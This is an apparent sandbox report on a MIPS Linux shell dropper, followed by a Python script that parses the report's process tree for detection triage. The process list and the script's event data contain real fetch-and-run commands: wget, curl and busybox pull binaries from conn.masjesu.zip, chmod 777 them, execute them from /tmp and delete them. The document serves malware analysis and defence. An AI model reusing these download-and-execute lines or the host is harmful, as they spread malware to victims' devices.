Analysis

  • max time kernel
    149s
  • max time network
    20s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    21/10/2024, 01:32

General

  • Target

    9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh

  • Size

    10KB

  • MD5

    b319003c3c601274b8d3c96e303370c0

  • SHA1

    9fe9064eb8767a3ea42c466bf21bce04eee50006

  • SHA256

    9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d

  • SHA512

    d215c64d523bfa6118135a76e27c20d1e7c53b3875d78412c3a25647e0075ee43bce16c44821f92b0acf65cd485b6f3067fc9beadb5daa282a1ba39768c33394

  • SSDEEP

    192:voNYIHKWYUzPf7v6qfo0M+//YJSw1zPL36qfo0G//YJXIYIHKWe:voOq76qfo0M+//YJSwh6qfo0G//YJX9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
    /tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
    1⤵
    PID:703
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:705
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      • System Network Configuration Discovery
      PID:711
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:721
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      • System Network Configuration Discovery
      PID:732
    • /bin/chmod
      chmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      • File and Directory Permissions Modification
      PID:744
    • /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      ./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      • Executes dropped EXE
      PID:746
    • /bin/rm
      rm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
      2⤵
      PID:748
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      • System Network Configuration Discovery
      PID:750
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:758
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      • System Network Configuration Discovery
      PID:765
    • /bin/chmod
      chmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      • File and Directory Permissions Modification
      PID:770
    • /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      ./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      • Executes dropped EXE
      PID:771
    • /bin/rm
      rm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
      2⤵
      PID:776
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6
      2⤵
      • System Network Configuration Discovery
      PID:777
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      PID:790

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK

    Filesize

    153B

    MD5

    998368d7c95ea4293237f2320546e440

    SHA1

    30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

    SHA256

    533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

    SHA512

    648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
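The process tree above records the same loop for each payload name: try wget, curl and busybox wget against the same URL, chmod 777 the result, execute it from /tmp, delete it, move to the next name. The example below is added here and is not part of the sandbox report or of the sample; it parses command lines shaped like those in the Processes section (the event list is constructed by hand from that section, with the report's PIDs) and recovers each fetch / chmod / exec / rm chain and the contacted domain, which is the triage a practitioner does before writing a detection. It also includes a header check for the dropped file listed under Downloads, because the report gives that file's hashes and a size of 153 bytes but not its content, and records the exec attempts without their outcome; the `classify_payload` function, the `FETCHERS` set and all function names are this example's own, not the sandbox's API.

```python
import re
import shlex
import struct
from urllib.parse import urlparse

# Constructed from the report's process tree: (pid, command line), in order.
SAMPLE_EVENTS = [
    (703, "/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh"),
    (705, "/bin/rm bins.sh"),
    (711, "wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (721, "curl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (732, "/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (744, "chmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (746, "./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (748, "rm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK"),
    (750, "wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (758, "curl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (765, "/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (770, "chmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (771, "./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (776, "rm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo"),
    (777, "wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6"),
    (790, "curl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6"),
]

URL_RE = re.compile(r"https?://\S+")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}   # assumed: tools such droppers try in turn


def _argv(cmd):
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def _tool(argv):
    """Program basename, looking through a 'busybox <applet>' prefix."""
    name = argv[0].rsplit("/", 1)[-1]
    if name == "busybox" and len(argv) > 1:
        name = argv[1]
    return name


def classify(cmd):
    """Map one command line to (kind, payload basename, extra)."""
    argv = _argv(cmd)
    if not argv:
        return ("other", None, None)
    tool = _tool(argv)
    url = URL_RE.search(cmd)
    if tool in FETCHERS and url:
        return ("fetch", urlparse(url.group(0)).path.rsplit("/", 1)[-1], url.group(0))
    if tool == "chmod" and len(argv) >= 3:
        return ("chmod", argv[-1].rsplit("/", 1)[-1], argv[1])
    if tool == "rm" and len(argv) >= 2:
        return ("rm", argv[-1].rsplit("/", 1)[-1], None)
    if argv[0].startswith(("./", "/tmp/")):          # execution out of the drop directory
        return ("exec", argv[0].rsplit("/", 1)[-1], None)
    return ("other", None, None)


def analyze(events):
    """Group events by payload name; only names first seen in a fetch are tracked."""
    chains, order = {}, []
    for pid, cmd in events:
        kind, name, extra = classify(cmd)
        if kind == "fetch":
            if name not in chains:
                chains[name] = {"name": name, "urls": set(), "fetchers": [],
                                "chmod": None, "exec_pid": None, "deleted": False}
                order.append(name)
            chains[name]["urls"].add(extra)
            chains[name]["fetchers"].append(_tool(_argv(cmd)))
        elif name in chains:
            if kind == "chmod":
                chains[name]["chmod"] = extra
            elif kind == "exec":
                chains[name]["exec_pid"] = pid
            elif kind == "rm":
                chains[name]["deleted"] = True
    return [chains[n] for n in order]


def completed_loops(chains):
    """Names that went through fetch, chmod, exec and rm: the full dropper pattern."""
    return [c["name"] for c in chains
            if c["chmod"] and c["exec_pid"] is not None and c["deleted"]]


def domains(chains):
    return sorted({urlparse(u).hostname for c in chains for u in c["urls"]})


def classify_payload(data):
    """Inspect a dropped file's ELF header: 'elf-mips', 'elf-other' or 'not-elf'."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return "not-elf"
    endian = ">" if data[5] == 2 else "<"                 # EI_DATA: 2 = big-endian
    e_machine = struct.unpack(endian + "H", data[18:20])[0]
    return "elf-mips" if e_machine == 8 else "elf-other"  # EM_MIPS == 8


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for c in found:
        print(c["name"], c["fetchers"], c["chmod"], c["exec_pid"], c["deleted"])
    print("completed:", completed_loops(found), "domains:", domains(found))
```

Run against the constructed events, the first two names come back as complete loops, the third as fetched only (the report's process list ends after its curl), and the only contacted host is conn.masjesu.zip. The `classify_payload` check is what you would run on the 153-byte file from the Downloads section before treating "Executes dropped EXE" as a successful bot launch rather than a failed exec of whatever the server returned.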